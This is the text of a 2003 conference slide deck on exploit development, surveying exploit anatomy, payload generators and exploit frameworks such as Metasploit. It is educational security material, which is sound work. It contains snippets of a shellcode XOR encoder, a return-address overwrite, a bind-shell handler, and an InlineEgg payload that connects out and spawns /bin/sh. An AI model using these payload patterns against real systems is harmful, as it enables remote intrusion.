Advanced Exploit Development

Hack in the Box 2003
Advanced Exploit Development

Trends and Tools
H D Moore
Who
Who am I?
Co-founder of Digital Defense Security researcher (5+ years) Projects DigitalOffense.net Metasploit.com
2
What
What is this about?

1. Exploit Trends 2. Anatomy of an Exploit 3. Common Exploit Problems 4. Payload Generators 5. Exploit Frameworks 6. Metasploit v2.0 Demo!
3
Why
Why should you see this?

Exploit basics and challenges Recent trends and advances New shellcode generation tools Review of exploit frameworks Exclusive look at Metasploit v2.0
4
Exploit Trends
#1: Exploit Trends
More Exploit Writers

Information reached critical mass Huge exploit devel community
Improved Techniques
No more local brute force 4 Bytes: GOT, SEH, PEB
6
#1: Exploit Trends
Reliable Exploit Code

Universal win32 addresses Allocation control techniques
Where Does This Lead?

Shrinking exploit timeline Exploit tools and frameworks
7
Anatomy of an Exploit
#2: Anatomy of an Exploit
Exploit Components
Target and option selection Network and protocol code Payload or shellcode Payload encoding routine Exploit request builder Payload handler routine
9
Target and option selection List of addresses and offsets Process user selected target Process other exploit options This adds up to a lot of code...
10

Process Options
./exp -h 1.2.3.4 -p 21 -t 0
Parsing command options...
Target System IP: 1.2.3.4 OS: Linux
11
Network and protocol code Resolve the target address Create the appropriate socket Connect the socket if needed Perform any error handling Start protocol negotiation
12

Process Options Network Conn
gethostbyname(sockaddr) socket(AF_INET, ...); connect(s, &sockaddr, 16) ftp_login(s, user, pass); Connecting to target...
13
Payload or shellcode Executes when exploit works Bindshell, Findsock, Adduser Normally written in assembly Stored in code as binary string Configuration done via offsets
14

Process Options Network Conn Payload
shellcodes[0] = \xeb... scode = shellcodes[target] scode[PORT] = htons(...) Setting target...
15
Payload encoding routine Most exploits restrict characters Encoder must filter these chars Standard type is XOR decode Often just pre-encode payload Payload options also encoded
16

Process Options Network Conn Payload Payload Encoder
for(x=0;x<sizeof(scode);x++) scode[x]^= 0x99;
Encoding shellcode...
17
Exploit request builder Code which triggers the vuln Ranges from simple to complex Can require various calculations Normally just string mangling Scripting languages excel at this
18

Process Options Network Conn
Sending exploit request... buf= web_request(/cgi-bin... memcpy(buf+100, scode, ...); buf[480] = (char *) retaddr; send(s, buf, strlen(buf));
Payload Payload Encoder Exploit Request
Payload
19
Payload handler routine Each payload needs a handler Often just connects to bindshell Reverse connect needs listener Connects console to socket Account for large chunk of code
20

Process Options Network Conn Payload Payload Encoder Exploit Request Payload Handler Bind Shell Payload
b = socket(AF_INET, ...); connect(b, &sockaddr, 16); handle_shell(b) Dropping to shell... sh-2.04# id uid=0(root) gid=0(root)...
21
Common Exploit Problems
22
#3: Common Exploit Problems
Exploit code is rushed Robust code takes time Coders race to be the first Old exploits are less useful Result: lots of broken code
23
Exploiting Complex Protocols RPC, SSH, SSL, SMB Exploit depends on API Exploit supplied as patch Restricts exploit environment Requires old software archive
24
Limited Target Sets

One-shot vulnerabilities suck Always limited testing resources Finding target values takes time
25
Payload Issues
Most hardcode payloads Firewalls can block bind shells Custom config breaks exploit No standard payload library
26
Payload Generators
27
#4: Payload Generators
Generator Basics
Dynamic payload creation Use a high-level language Useful for custom situations
28
Many Generator Projects

Only a few are usable Spawned from frameworks Impressive capabilities so far
29
Impurity (Alexander Cuttergo)

Shellcode downloads to memory Executable is staticly linked C Allows library functions No filesystem access required Supports Linux on x86
30
31
Shellforge (Philippe Biondi )

Transforms C to payload Uses GCC and python Includes helper API Simple and usable
32
Shellforge Example:
#include "include/sfsyscall.h" int main(void) { char buf[] = "Hello world!\n"; write(1, buf, sizeof(buf)); exit(0); }
33
MOSDEF (Immunity Inc)

GPL spawn of CANVAS Dynamic code via python API loader via import tags Compile, send, exec, return Version 0.1 not ready to use
34
MOSDEF Example:
#import "remote","Kernel32._lcreat" as "_lcreat" #import "string","filename" as "filename //start of code void main() { int i; i=_lcreat(filename); sendint(i,i); }
35
InlineEgg (CORE SDI)

Spawn of CORE Impact Dynamic code via python Non-commercial use only Supports Linux, BSD, Windows...
36
InlineEgg Example:
egg = InlineEgg(Linuxx86Syscall) # connect to other side sock = egg.socket(socket.AF_INET,socket.SOCK_STREAM) sock = egg.save(sock) egg.connect(sock,(connect_addr, connect_port)) # dup and exec egg.dup2(sock, 0) egg.dup2(sock, 1) egg.dup2(sock, 2) egg.execve('/bin/sh',('bash','-i'))
37
Exploit Frameworks
38
#5: Exploit Frameworks
Framework Basics
Library of common routines Simple to add new payloads Minimize development time Platform for new techniques
39
Public Exploit Frameworks

Two stable commercial products Handful of open source projects New projects in stealth mode
40
CORE Impact (CORE SDI)

Strong product, 2+ years old Skilled development team Massive number of exploits Python and C++ (Windows) Starts at $15,000 USD
41
CORE Impact (CORE SDI)

Stable syscall proxy system Full development platform Discovery and probe modules Macro function capabilities Integrated XML reporting
42
43
Windows ASM Components

Solid design, great features Includes skeleton and manager Full source code is available Written in C and ASM Modular development system
44
Windows ASM Components

Small first stage component Installs payload over network Avoid bytes with XOR encoder Fork, Bind, Connect, Findsock
45
46
CANVAS (Immunity Inc)

New and gaining ground Small set of reliable exploits Includes non-public 0-day Supports Linux & Windows Priced at $995 USD
47
CANVAS (Immunity Inc)

Working syscall proxy system Solid payload encoder system Includes API for developers Exploits Solaris, Linux, Windoze Automatic SQL injection module
48
49
LibExploit (Simon Femerling)

New project, improving quickly C library to simply development Includes two sample exploits Currently supports Linux x86 Released as open source (GPL)
50
LibExploit (Simon Femerling)

Includes ~30 stock payloads Generate dynamic payloads Can encode with ADMutate Common networking API Built-in exploit console
51
52
Metasploit Exploit Framework

Complete exploit environment Small set of reliable exploits Trivial to use new payloads Handlers and callbacks Full source code (OSS)
53
Metasploit Exploit Framework

Modular and extensible API Protocol modules and routines Easy to add new interfaces Designed to allow embedding Very active development
54
55
Questions?
56
Metasploit Framework Demonstration
57

Advanced Exploit Development

Uploaded by

Advanced Exploit Development

Uploaded by

Hack in the Box 2003